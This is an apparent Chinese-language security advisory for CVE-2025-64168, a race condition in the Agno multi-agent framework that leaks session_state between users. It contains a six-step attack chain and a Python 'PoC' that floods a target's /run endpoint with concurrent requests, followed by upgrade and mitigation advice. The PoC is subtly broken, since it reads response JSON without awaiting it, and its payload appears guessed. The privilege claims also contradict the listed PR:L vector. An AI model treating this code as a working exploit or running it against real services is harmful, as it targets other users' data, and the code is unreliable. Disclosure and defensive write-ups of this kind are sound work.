CVE-2025-64168: Agno多代理框架竞态条件导致跨会话数据泄露

漏洞信息

漏洞编号

CVE-2025-64168

漏洞类型

竞态条件

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Agno

漏洞概述

Agno是一个多代理框架、运行时和控制平面。该漏洞存在于2.0.0至2.2.2版本之间，在高并发场景下，当session_state被传递给Agent或Team进行run或arun调用时，存在竞态条件漏洞。该漏洞可能导致session_state被错误地分配和持久化到其他会话中，从而造成一个用户的数据被暴露给另一个用户。这是一种严重的数据泄露风险，攻击者可能通过构造高并发请求来获取其他用户的敏感会话信息。漏洞已于2.2.2版本中修复。

技术细节

该漏洞的根本原因在于Agno框架在处理并发session_state时的线程安全问题。当多个用户同时发起请求，且session_state被传递给Agent或Team对象时，由于缺少适当的同步机制，线程A的session_state可能被线程B的操作覆盖或污染。具体来说，在run或arun调用过程中，session_state的读写操作不是原子性的，导致在高并发环境下可能出现以下情况：1) session_state被错误地写入到其他用户的会话中；2) 用户获取到其他用户的session_state；3) 会话数据交叉污染。由于CVSS评分7.1主要反映了高机密性影响（C:H），攻击者无需特殊权限即可利用此漏洞窃取其他用户的敏感数据。

攻击链分析

STEP 1

步骤1

攻击者识别目标Agno应用，确认其为2.0.0至2.2.2版本

STEP 2

步骤2

攻击者构造大量并发请求，模拟高并发场景

STEP 3

步骤3

在请求中注入恶意的session_state或尝试获取其他用户的session_id

STEP 4

步骤4

利用竞态条件，在session_state读写过程中插入操作，导致数据写入错误会话

STEP 5

步骤5

接收响应，检查是否获取到其他用户的敏感session_state数据

STEP 6

步骤6

利用泄露的session_state冒充合法用户执行后续恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import asyncio
import aiohttp
from concurrent.futures import ThreadPoolExecutor

# PoC for CVE-2025-64168: Race condition in Agno session_state handling
# This demonstrates the race condition that can leak session data between users

async def exploit_session_leak(target_url: str, session_id: str):
    """
    Simulate concurrent requests that may trigger the race condition
    in Agno's session_state handling
    """
    async with aiohttp.ClientSession() as session:
        payload = {
            'session_id': session_id,
            'session_state': {
                'user_data': 'sensitive_information',
                'tokens': ['token1', 'token2']
            },
            'agent_config': {
                'name': 'test_agent',
                'model': 'gpt-4'
            }
        }
        
        # Send concurrent requests to trigger race condition
        tasks = []
        for i in range(100):
            tasks.append(session.post(f'{target_url}/run', json=payload))
        
        responses = await asyncio.gather(*tasks, return_exceptions=True)
        return responses

def check_session_leak(responses):
    """
    Check if any responses contain session data from other users
    """
    leaked_data = []
    for i, resp in enumerate(responses):
        if hasattr(resp, 'json'):
            try:
                data = resp.json()
                if 'session_state' in data and data['session_state']:
                    leaked_data.append({
                        'response_index': i,
                        'leaked_session': data['session_state']
                    })
            except:
                pass
    return leaked_data

# Usage
# asyncio.run(exploit_session_leak('http://target:port', 'victim_session_id'))

影响范围

Agno >= 2.0.0 且 < 2.2.2

防御指南

临时缓解措施

立即将Agno框架升级到2.2.2或更高版本。如果无法立即升级，可以采取以下临时缓解措施：1) 限制并发请求数量，使用速率限制器；2) 实施会话绑定，确保session_state与用户身份严格关联；3) 增加会话状态完整性校验；4) 监控异常的数据访问模式；5) 考虑使用会话隔离技术将不同用户的请求分配到独立的处理队列中。